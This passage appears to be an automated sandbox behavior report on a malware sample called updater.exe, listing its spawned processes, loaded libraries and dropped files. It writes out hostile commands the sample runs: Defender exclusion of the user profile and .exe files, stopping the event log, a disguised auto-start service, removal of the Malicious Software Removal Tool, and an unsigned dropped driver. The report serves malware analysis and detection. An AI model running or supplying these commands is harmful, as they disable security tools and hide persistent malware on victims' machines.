                Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
                Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"Jump to behavior
                Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"Jump to behavior
                Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
                Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exeJump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\conhost.exe conhost.exeJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                Source: C:\Users\user\Desktop\updater.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
                Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
                Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: licensemanagersvc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: licensemanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: updater.exeStatic PE information: Image base 0x140000000 > 0x60000000
                Source: updater.exeStatic file information: File size 5285888 > 1048576
                Source: updater.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x4f5e00
                Source: updater.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: updater.exe, 00000018.00000003.2105630449.0000021747340000.00000004.00000001.00020000.00000000.sdmp
                Source: updater.exeStatic PE information: section name: .00cfg
                Source: updater.exe.0.drStatic PE information: section name: .00cfg
                Source: C:\Windows\System32\conhost.exeCode function: 36_2_0000000140001394 push qword ptr [0000000140009004h]; ret 36_2_0000000140001403

                Persistence and Installation Behavior

                barindex
                Sample is not signed and drops a device driver
                Source: C:\ProgramData\Google\Chrome\updater.exeFile created: C:\Windows\TEMP\maoxoafwbtki.sysJump to behavior
                Source: C:\Users\user\Desktop\updater.exeFile created: C:\ProgramData\Google\Chrome\updater.exeJump to dropped file
                Source: C:\ProgramData\Google\Chrome\updater.exeFile created: C:\Windows\Temp\maoxoafwbtki.sysJump to dropped file
                Source: C:\Users\user\Desktop\updater.exeFile created: C:\ProgramData\Google\Chrome\updater.exeJump to dropped file
                Source: C:\ProgramData\Google\Chrome\updater.exeFile created: C:\Windows\Temp\maoxoafwbtki.sysJump to dropped file
                Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
